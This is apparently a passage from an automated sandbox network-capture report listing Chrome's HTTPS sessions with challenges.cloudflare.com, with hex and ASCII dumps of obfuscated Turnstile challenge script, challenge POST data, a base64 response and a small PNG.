                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 56 28 67 4a 28 31 33 31 32 29 29 26 26 28 66 53 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 63 2c 63 2c 64 2c 65 29 7b 69 63 3d 67 4a 2c 63 3d 7b 27 4f 53 52 53 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 4a 42 67 5a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 75 75 79 52 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 63 28 31 31 34 31 29 5d 5b 69 63 28 35 37 36 29 5d 7c 7c 31 65 34 2c 65 3d 66 51 28 29 2c 21 65 4d 5b 69 63 28 33 32 39 29 5d 26 26 21 66 76 28 29 26 26 21 65 4d 5b 69 63 28 31 37 38 29 5d 5b 69 63 28 35 38 35 29 5d 26 26 63 5b 69 63 28 39 36 38 29 5d 28 65 2c 66 50 29 3e
                                                                                                Data Ascii: V(gJ(1312))&&(fS(),setInterval(function(ic,c,d,e){ic=gJ,c={'OSRSm':function(f,g){return f-g},'JBgZd':function(f){return f()},'uuyRJ':function(f){return f()}},d=eM[ic(1141)][ic(576)]||1e4,e=fQ(),!eM[ic(329)]&&!fv()&&!eM[ic(178)][ic(585)]&&c[ic(968)](e,fP)>
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 20 69 26 68 7d 2c 27 42 68 76 45 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4b 56 53 42 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 59 48 4e 54 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 55 78 57 78 71 27 3a 69 65 28 31 34 37 30 29 2c 27 66 75 68 6f 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 63 48 4a 63 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 6d 55 64 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 50 77 6b 4d 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65
                                                                                                Data Ascii: i&h},'BhvEs':function(h,i){return h&i},'KVSBA':function(h,i){return h(i)},'YHNTi':function(h,i){return h-i},'UxWxq':ie(1470),'fuhoe':function(h,i){return h==i},'cHJcC':function(h,i){return h(i)},'AmUdS':function(h,i){return i!=h},'PwkMy':function(h,i){re
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 6c 73 65 20 69 66 28 64 5b 69 69 28 36 30 35 29 5d 3d 3d 3d 64 5b 69 69 28 36 30 35 29 5d 29 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 69 28 33 34 31 29 5d 28 49 2c 31 29 7c 4e 2c 64 5b 69 69 28 38 35 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 69 28 31 34 31 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 69 28 31 34 38 34 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 69 69 28 35 31 34 29 5d 28 64 5b 69 69 28 31 32 37 30 29 5d 28 49 2c 31 29 2c 4e 26 31 29 2c 64 5b 69 69 28 39 38 36 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 69 28 31 34 31 34 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65
                                                                                                Data Ascii: lse if(d[ii(605)]===d[ii(605)]){for(N=1,x=0;x<G;I=d[ii(341)](I,1)|N,d[ii(853)](J,j-1)?(J=0,H[ii(1414)](o(I)),I=0):J++,N=0,x++);for(N=D[ii(1484)](0),x=0;16>x;I=d[ii(514)](d[ii(1270)](I,1),N&1),d[ii(986)](J,j-1)?(J=0,H[ii(1414)](o(I)),I=0):J++,N>>=1,x++);}e
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 35 33 29 5d 28 4a 2c 64 5b 69 69 28 31 30 38 39 29 5d 28 6a 2c 31 29 29 29 7b 48 5b 69 69 28 31 34 31 34 29 5d 28 6f 28 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 69 69 28 31 33 36 31 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 6b 29 7b 72 65 74 75 72 6e 20 69 6b 3d 69 65 2c 64 5b 69 6b 28 31 34 32 37 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 6b 28 31 34 38 30 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 6c 29 7b 72 65 74 75 72 6e 20 69 6c 3d 69 6b 2c 64 5b 69 6c 28 34 31 31 29 5d 21 3d 3d 69 6c 28 31 34 37 30 29 3f 64 5b 69 6c 28 31 31 34 31 29 5d 5b 69 6c 28 31 31 39 37 29 5d 3a 68 5b 69 6c 28 31 34 38 34 29 5d 28
                                                                                                Data Ascii: 53)](J,d[ii(1089)](j,1))){H[ii(1414)](o(I));break}else J++;return H[ii(1361)]('')},'j':function(h,ik){return ik=ie,d[ik(1427)](null,h)?'':''==h?null:f.i(h[ik(1480)],32768,function(i,il){return il=ik,d[il(411)]!==il(1470)?d[il(1141)][il(1197)]:h[il(1484)](


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.550031104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:21 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 3205
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                CF-Challenge: ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:21 UTC3205OUTData Raw: 76 5f 38 66 65 63 61 37 65 65 66 61 66 30 34 32 62 62 3d 39 4a 24 72 59 72 57 72 2d 72 78 72 44 79 5a 42 79 5a 6c 72 79 41 37 68 7a 33 79 4d 5a 7a 62 77 5a 64 6c 5a 70 69 56 70 42 35 7a 5a 37 41 7a 68 55 56 35 57 5a 6c 5a 24 41 79 63 70 53 5a 73 56 5a 68 55 6b 63 72 4d 55 5a 75 72 79 55 63 79 46 66 4c 70 63 5a 71 72 66 66 48 5a 47 56 5a 2d 47 5a 4c 41 5a 75 5a 50 57 6e 37 30 41 6f 56 70 2d 31 5a 24 6c 4f 57 5a 35 41 79 36 4a 72 35 25 32 62 74 55 5a 4c 74 48 6e 38 58 51 4f 53 31 41 42 5a 37 4e 30 57 6e 59 66 5a 31 33 73 32 4c 7a 39 57 46 56 70 39 39 4d 2d 4d 45 66 2d 4a 66 44 72 4f 39 46 63 42 5a 46 2d 7a 63 4b 35 76 46 4e 68 5a 24 56 70 6c 5a 66 78 31 68 71 71 76 5a 37 2d 5a 63 41 6c 2b 5a 70 59 51 5a 79 33 5a 77 6c 62 64 39 69 5a 4b 35 6c 69 5a 62 41 63
                                                                                                Data Ascii: v_8feca7eefaf042bb=9J$rYrWr-rxrDyZByZlryA7hz3yMZzbwZdlZpiVpB5zZ7AzhUV5WZlZ$AycpSZsVZhUkcrMUZuryUcyFfLpcZqrffHZGVZ-GZLAZuZPWn70AoVp-1Z$lOWZ5Ay6Jr5%2btUZLtHn8XQOS1ABZ7N0WnYfZ13s2Lz9WFVp99M-MEf-JfDrO9FcBZF-zcK5vFNhZ$VplZfx1hqqvZ7-ZcAl+ZpYQZy3Zwlbd9iZK5liZbAc
                                                                                                2025-01-08 13:50:21 UTC759INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:21 GMT
                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                Content-Length: 152620
                                                                                                Connection: close
                                                                                                cf-chl-gen: nmudTpUuVMCLI1BS2uorteDGTm33LmMsUGSgkT1cWEb+D9aG7rFLFPR+XJD2A/eTKZGM245vA1q+I3UEmXkrvRp3z4pVc9gjzsgo7QC4Y/yuQHjcC0RBWAjQOQFu80R/RpIcfqlnXtvI6WMW2OK7BUJ/Woq5OiW0xtaq51GZoymtbC+Y+Qo/U2NxR764NJpVPSf6hPtd0G9d3VnR9UR1gu3FfYn9apLQPJB4P2yi7WTMY0x1uqNoPQa0W3j4e387bDtQkrETHbEaXscjMAB2DyJ7pGkjK1YsI4oCJwAeNT4HXj+5FI7q/TvG44L9WM/dVZMBzJUoSSlAYnA809NloFc0GIpL2l1XuGmmx02kCH4M3FHg2HXcKRxYffqOFM3cIU8ZPIqB7oOxP7q1hbhjrdjoSNYedBpdytAeFqNdfeF6bfOTehWANsPWNIBnQxLdO8+Y0bQSlknbvlHBuGljkJOG1SC13vYhygq3WvZeCwNR7sc555d+xrW/RQ==$rJQoRLYGw87adZiq
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca7fa0a73182d-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:21 UTC610INData Raw: 59 47 70 6d 67 6f 4e 4b 6c 6c 42 4a 68 48 4e 56 6a 31 53 50 6e 70 79 62 6f 6e 2b 6b 5a 49 31 59 58 57 56 38 6d 6e 5a 37 6e 47 71 63 67 49 64 71 69 59 57 6b 6c 34 75 78 6a 4a 61 32 70 61 6d 31 72 58 5a 7a 73 48 36 79 77 48 79 76 67 72 69 38 6f 5a 32 75 72 36 50 49 69 36 76 52 76 62 33 55 78 59 36 4c 78 70 62 4b 70 70 33 4c 30 35 6d 64 77 73 50 55 35 39 53 32 30 36 58 65 75 64 2b 6d 35 75 76 45 78 2b 72 76 79 4e 2b 76 74 65 4c 59 2b 62 71 7a 74 50 66 73 30 64 50 79 2b 66 33 56 39 4f 6a 6e 77 65 48 64 32 75 2f 6a 2b 2b 54 77 79 2f 37 6f 39 4d 2f 59 34 75 30 46 36 4f 58 55 2b 66 45 4e 32 42 76 6a 2f 76 6e 39 33 68 58 36 4b 67 54 33 42 51 34 4d 47 77 6e 72 39 42 38 51 37 77 34 6d 4b 50 54 38 50 77 6e 31 2f 53 38 50 48 78 42 44 41 53 49 64 50 41 52 42 48 7a 6f
                                                                                                Data Ascii: YGpmgoNKllBJhHNVj1SPnpybon+kZI1YXWV8mnZ7nGqcgIdqiYWkl4uxjJa2pam1rXZzsH6ywHyvgri8oZ2ur6PIi6vRvb3UxY6LxpbKpp3L05mdwsPU59S206Xeud+m5uvEx+rvyN+vteLY+bqztPfs0dPy+f3V9OjnweHd2u/j++Twy/7o9M/Y4u0F6OXU+fEN2Bvj/vn93hX6KgT3BQ4MGwnr9B8Q7w4mKPT8Pwn1/S8PHxBDASIdPARBHzo
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 55 56 57 68 73 6d 47 78 38 71 4b 68 6b 33 54 79 46 6c 4d 79 67 35 4a 79 6f 73 4a 43 46 73 4c 47 38 72 61 31 5a 45 63 6a 56 70 56 7a 4e 79 58 6a 6c 36 4f 31 64 53 64 58 4a 2f 55 45 4e 79 55 57 45 39 56 33 56 37 62 45 61 47 54 49 4e 4f 6b 57 6c 34 54 6d 64 33 69 6d 52 35 6b 34 78 65 57 33 35 32 62 46 64 59 59 46 36 6e 64 61 65 4e 71 6e 36 6b 63 4b 43 53 62 48 4f 4f 62 61 5a 76 64 35 69 71 64 59 79 35 69 62 56 35 72 49 79 2b 6e 35 4f 2b 75 4c 48 48 6f 72 57 6e 71 59 57 38 6f 38 79 4e 71 4a 32 50 30 74 4b 36 73 39 61 53 79 37 48 53 79 4e 75 79 6e 38 57 36 75 37 57 65 6f 65 58 45 77 74 79 6d 37 71 4c 66 78 4f 66 6c 76 65 6e 51 37 73 48 58 79 50 48 74 2b 65 7a 75 37 2b 7a 42 2b 66 55 43 38 50 62 33 39 51 30 43 2f 51 72 71 2f 67 44 39 44 51 6f 47 45 63 30 48 43
                                                                                                Data Ascii: UVWhsmGx8qKhk3TyFlMyg5JyosJCFsLG8ra1ZEcjVpVzNyXjl6O1dSdXJ/UENyUWE9V3V7bEaGTINOkWl4Tmd3imR5k4xeW352bFdYYF6ndaeNqn6kcKCSbHOObaZvd5iqdYy5ibV5rIy+n5O+uLHHorWnqYW8o8yNqJ2P0tK6s9aSy7HSyNuyn8W6u7WeoeXEwtym7qLfxOflvenQ7sHXyPHt+ezu7+zB+fUC8Pb39Q0C/Qrq/gD9DQoGEc0HC
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 73 49 6c 64 6c 4e 30 49 66 51 44 68 6f 4e 6b 4a 63 54 43 63 6d 58 6a 46 75 59 55 59 2f 5a 30 45 79 4c 47 64 4f 4e 47 70 4a 53 54 70 59 62 31 61 47 63 6c 46 52 68 7a 78 33 58 6f 31 70 53 33 46 62 58 47 64 65 62 5a 42 77 56 6d 61 61 6c 4a 70 64 62 70 5a 77 66 36 4b 57 6d 70 4a 36 6e 58 5a 33 5a 36 42 6a 59 34 4b 6c 69 58 39 76 71 4c 4a 72 69 71 32 4f 68 33 65 77 75 48 4f 53 74 61 71 50 66 37 69 44 6b 72 57 2b 6c 5a 6d 32 68 5a 61 6f 77 71 58 51 7a 36 32 6a 6a 36 44 4a 69 61 6a 57 6b 4c 61 35 6c 4d 6d 78 30 75 47 39 6d 62 47 6a 6e 64 65 79 30 72 4c 59 33 37 72 61 79 4e 69 78 37 62 2f 76 79 63 57 75 77 65 7a 37 39 76 6a 55 74 64 65 79 74 77 44 4e 32 2b 50 67 77 50 59 41 38 2f 66 33 32 67 48 50 7a 75 48 61 37 76 55 53 38 75 54 77 38 50 66 38 42 66 6e 70 41 66
                                                                                                Data Ascii: sIldlN0IfQDhoNkJcTCcmXjFuYUY/Z0EyLGdONGpJSTpYb1aGclFRhzx3Xo1pS3FbXGdebZBwVmaalJpdbpZwf6KWmpJ6nXZ3Z6BjY4KliX9vqLJriq2Oh3ewuHOStaqPf7iDkrW+lZm2hZaowqXQz62jj6DJiajWkLa5lMmx0uG9mbGjndey0rLY37rayNix7b/vycWuwez79vjUtdeytwDN2+PgwPYA8/f32gHPzuHa7vUS8uTw8Pf8BfnpAf
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 53 43 55 6c 5a 45 45 6f 50 6a 34 37 4c 53 31 73 52 55 78 70 61 55 68 4a 65 45 78 47 66 45 31 35 58 31 4e 2f 54 54 31 67 66 57 41 2b 65 32 64 55 57 48 32 41 63 48 6c 6a 63 57 78 54 6c 59 56 6a 67 5a 47 48 59 34 61 4e 64 6d 6c 74 64 47 47 42 6c 6e 68 31 6b 48 39 38 68 47 4e 39 72 49 6c 2f 70 5a 6c 36 73 4a 57 78 67 5a 53 53 6a 33 4b 71 6d 4a 61 4a 69 4a 65 71 75 72 6a 43 76 49 2b 42 6b 61 43 70 79 4d 6a 4b 6a 5a 2f 4d 79 63 75 37 76 4d 79 55 6f 64 62 54 78 5a 54 58 79 70 79 36 72 4c 79 7a 78 4c 66 65 7a 75 69 35 6f 62 57 37 37 64 57 32 35 4e 48 72 34 61 76 53 7a 39 4c 49 7a 73 48 49 75 50 4f 36 35 73 2f 72 41 4e 32 39 76 66 6e 2b 38 73 6a 52 36 74 50 4b 39 67 44 50 32 76 33 69 34 68 4d 48 7a 75 34 4f 43 68 62 71 43 77 77 4b 45 52 59 53 48 64 30 54 46 42 48
                                                                                                Data Ascii: SCUlZEEoPj47LS1sRUxpaUhJeExGfE15X1N/TT1gfWA+e2dUWH2AcHljcWxTlYVjgZGHY4aNdmltdGGBlnh1kH98hGN9rIl/pZl6sJWxgZSSj3KqmJaJiJequrjCvI+BkaCpyMjKjZ/Mycu7vMyUodbTxZTXypy6rLyzxLfezui5obW77dW25NHr4avSz9LIzsHIuPO65s/rAN29vfn+8sjR6tPK9gDP2v3i4hMHzu4OChbqCwwKERYSHd0TFBH
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 30 68 51 53 53 52 50 52 45 42 78 61 33 4e 58 52 31 52 48 4e 31 78 6e 56 33 56 51 59 46 74 6d 65 59 69 4a 4f 33 39 6c 59 6d 79 43 57 6d 4b 4a 54 6b 6d 47 63 32 5a 6d 67 56 56 56 6c 48 56 59 62 6d 36 41 58 56 32 63 65 57 42 32 64 6e 4e 6c 5a 61 52 39 68 4b 47 68 67 49 47 77 68 48 36 30 68 62 47 58 69 37 65 46 65 59 69 35 6d 58 61 4e 72 59 36 51 74 62 69 6f 73 5a 75 70 70 61 71 63 6d 71 37 4a 71 4b 44 4c 6e 35 43 73 72 74 61 55 32 4a 66 55 71 4c 62 67 73 38 36 73 32 72 44 65 30 62 61 78 33 39 36 6c 77 74 61 32 72 73 54 78 71 71 72 73 7a 63 58 4f 75 4f 7a 73 79 63 37 33 2f 62 7a 58 39 4e 37 51 77 65 62 35 43 66 33 49 33 64 58 46 32 63 6e 69 34 78 49 46 7a 65 4c 55 35 74 50 7a 39 42 45 4c 47 67 7a 74 30 65 6b 5a 33 69 55 46 47 50 50 2b 48 68 6f 6c 35 52 73 63
                                                                                                Data Ascii: 0hQSSRPREBxa3NXR1RHN1xnV3VQYFtmeYiJO39lYmyCWmKJTkmGc2ZmgVVVlHVYbm6AXV2ceWB2dnNlZaR9hKGhgIGwhH60hbGXi7eFeYi5mXaNrY6QtbiosZuppaqcmq7JqKDLn5CsrtaU2JfUqLbgs86s2rDe0bax396lwta2rsTxqqrszcXOuOzsyc73/bzX9N7Qweb5Cf3I3dXF2cni4xIFzeLU5tPz9BELGgzt0ekZ3iUFGPP+Hhol5Rsc
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 4e 56 65 47 46 6b 64 48 6c 30 55 55 68 49 4d 6c 56 4e 66 7a 32 42 67 7a 6c 39 52 48 68 2b 66 58 71 44 66 32 2b 44 69 32 74 50 68 6c 57 4e 5a 46 56 6d 69 47 39 62 56 59 74 30 6b 48 36 64 70 48 32 43 67 49 4f 45 59 71 75 42 70 34 69 76 67 58 78 74 6b 37 47 30 74 4c 57 46 6b 36 75 4d 69 4a 61 4b 6d 70 47 63 67 61 7a 42 6e 6f 48 48 6c 61 4f 37 6e 4a 69 6d 6d 71 71 68 72 4a 47 38 30 61 36 52 31 36 57 7a 79 36 79 6f 74 71 62 4e 75 4a 4f 63 76 72 66 62 6e 64 79 32 77 4c 72 64 77 74 7a 49 70 63 43 38 75 74 44 47 79 64 4c 4d 78 4e 4c 4f 37 62 4c 38 36 72 2f 63 37 2f 62 31 30 4e 50 7a 35 76 66 57 77 75 62 46 44 67 2f 47 43 2f 6b 53 30 77 30 47 37 50 59 4e 31 64 72 52 48 4e 77 4c 39 67 7a 62 32 65 44 76 45 2f 58 36 48 42 6a 36 2b 65 4d 62 4b 69 72 71 2b 77 54 2b 43
                                                                                                Data Ascii: NVeGFkdHl0UUhIMlVNfz2Bgzl9RHh+fXqDf2+Di2tPhlWNZFVmiG9bVYt0kH6dpH2CgIOEYquBp4ivgXxtk7G0tLWFk6uMiJaKmpGcgazBnoHHlaO7nJimmqqhrJG80a6R16Wzy6yotqbNuJOcvrfbndy2wLrdwtzIpcC8utDGydLMxNLO7bL86r/c7/b10NPz5vfWwubFDg/GC/kS0w0G7PYN1drRHNwL9gzb2eDvE/X6HBj6+eMbKirq+wT+C
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 50 4d 7a 74 65 54 46 78 4e 67 44 35 66 57 6e 79 47 65 31 64 69 67 58 32 49 52 58 35 2f 66 58 79 4a 68 5a 43 59 68 6f 65 45 62 47 6c 54 6b 58 5a 62 6a 34 78 77 62 33 68 36 6c 58 47 47 5a 46 32 68 61 4a 79 75 6f 4a 4b 51 68 59 47 77 67 61 65 4a 6c 35 52 35 6a 37 74 36 65 59 43 67 6e 33 71 31 76 49 4b 31 71 62 2b 54 6c 71 33 48 77 49 62 4b 72 39 4b 50 73 6f 75 51 69 64 69 55 79 4c 79 62 76 74 50 66 76 72 76 61 32 39 79 69 72 74 57 69 35 65 65 64 34 61 6a 63 37 37 6e 52 36 4e 53 78 38 4e 48 6e 79 64 66 55 75 63 62 34 75 72 6e 41 34 4e 2b 36 39 66 7a 43 39 65 6b 41 30 39 62 74 43 41 2f 50 32 4f 37 75 36 39 30 44 31 4f 6f 4a 34 68 41 50 32 41 7a 76 41 66 49 61 47 78 30 62 37 2f 45 55 35 64 2f 6e 47 52 33 34 2f 42 73 70 4a 4f 30 73 38 51 77 48 4b 78 6f 4e 4e 69
                                                                                                Data Ascii: PMzteTFxNgD5fWnyGe1digX2IRX5/fXyJhZCYhoeEbGlTkXZbj4xwb3h6lXGGZF2haJyuoJKQhYGwgaeJl5R5j7t6eYCgn3q1vIK1qb+Tlq3HwIbKr9KPsouQidiUyLybvtPfvrva29yirtWi5eed4ajc77nR6NSx8NHnydfUucb4urnA4N+69fzC9ekA09btCA/P2O7u690D1OoJ4hAP2AzvAfIaGx0b7/EU5d/nGR34/BspJO0s8QwHKxoNNi
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 63 55 31 64 63 46 75 43 69 56 4a 59 61 34 31 4e 68 6d 43 52 61 56 31 6e 63 33 46 75 61 35 57 46 6a 34 75 4c 6d 31 47 67 58 32 32 67 58 59 46 6c 5a 58 36 53 71 47 71 4c 72 57 69 6e 68 48 71 4a 62 4a 4b 53 72 47 36 53 70 4c 65 30 68 4b 71 5a 68 36 75 36 6b 72 71 52 65 35 4f 67 6d 34 4e 38 69 4a 32 45 72 49 33 4c 77 6f 36 2b 70 38 47 6d 32 49 36 50 75 37 79 38 7a 39 32 77 6d 5a 50 55 72 35 75 30 73 62 71 68 79 4e 79 30 72 4d 47 33 71 63 48 70 37 36 58 71 39 4d 4c 74 74 72 6e 73 78 74 43 38 7a 72 2b 2b 77 4c 36 39 78 50 48 37 41 37 6f 43 77 63 50 68 2f 63 51 4f 35 41 48 65 7a 77 33 67 37 68 6e 72 42 2b 51 54 35 68 77 5a 43 66 45 66 39 66 37 30 45 74 7a 38 2b 4f 6b 66 39 50 54 33 37 69 54 72 42 78 41 45 38 68 51 45 45 51 55 4f 42 2f 73 35 4e 78 58 34 4d 78 45
                                                                                                Data Ascii: cU1dcFuCiVJYa41NhmCRaV1nc3Fua5WFj4uLm1GgX22gXYFlZX6SqGqLrWinhHqJbJKSrG6SpLe0hKqZh6u6krqRe5Ogm4N8iJ2ErI3Lwo6+p8Gm2I6Pu7y8z92wmZPUr5u0sbqhyNy0rMG3qcHp76Xq9MLttrnsxtC8zr++wL69xPH7A7oCwcPh/cQO5AHezw3g7hnrB+QT5hwZCfEf9f70Etz8+Okf9PT37iTrBxAE8hQEEQUOB/s5NxX4MxE
                                                                                                2025-01-08 13:50:21 UTC1369INData Raw: 44 79 41 52 48 71 4d 61 6d 43 45 53 34 68 38 63 6e 4a 68 59 56 4b 57 68 32 36 65 55 47 6c 70 57 5a 36 50 64 71 5a 38 63 58 47 6e 6e 49 70 65 69 57 53 66 65 61 2b 4f 68 36 36 31 66 6f 53 58 70 6e 65 6f 74 70 6d 47 6a 4b 69 69 66 62 79 62 67 4a 61 57 70 6f 57 46 78 4b 43 49 6e 70 36 61 71 72 2b 50 72 34 65 6d 70 71 47 78 32 74 79 73 70 62 76 4b 72 61 33 4d 6d 62 44 56 32 4e 4c 52 75 38 6a 49 71 2b 33 64 77 39 6e 70 33 38 61 7a 39 65 53 32 34 66 48 6d 74 62 76 39 37 4c 62 70 2b 65 2f 39 34 74 4f 39 35 67 4c 59 77 2b 58 4d 32 73 33 66 35 41 51 49 38 74 49 55 35 64 49 58 36 66 62 6d 48 66 66 64 46 2f 4d 69 2b 65 33 38 42 41 49 44 42 53 6f 56 42 69 6f 4a 4a 67 6b 75 49 77 50 39 4c 53 50 32 43 52 54 77 45 53 6f 56 39 69 67 5a 48 52 77 66 48 45 4a 48 50 69 46 47
                                                                                                Data Ascii: DyARHqMamCES4h8cnJhYVKWh26eUGlpWZ6PdqZ8cXGnnIpeiWSfea+Oh661foSXpneotpmGjKiifbybgJaWpoWFxKCInp6aqr+Pr4empqGx2tyspbvKra3MmbDV2NLRu8jIq+3dw9np38az9eS24fHmtbv97Lbp+e/94tO95gLYw+XM2s3f5AQI8tIU5dIX6fbmHffdF/Mi+e38BAIDBSoVBioJJgkuIwP9LSP2CRTwESoV9igZHRwfHEJHPiFG


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.2.550032104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:23 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8feca7eefaf042bb/1736344221782/yp26R9IhIYuAHho HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:50:23 UTC200INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:50:23 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca80348944294-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:50:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 47 08 02 00 00 00 9b 26 b0 f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDRG&IDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.2.550033104.18.95.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:50:23 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1616110350:1736343072:QTukKO-3rnkh5oSMj4bmwfvqfLwGTNfL7xuiRGubg6s/8feca7eefaf042bb/ghySCgmgzWFOmDPDrS26.j0yKRYwxDxH8pEt0ykykzM-1736344220-1.1.1.1-2XIMhubvoLlhHuebeEIOvK9GTQZzT7N5Q9E3GGq2qaz955cD2DXnSYumL7LUYM33 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
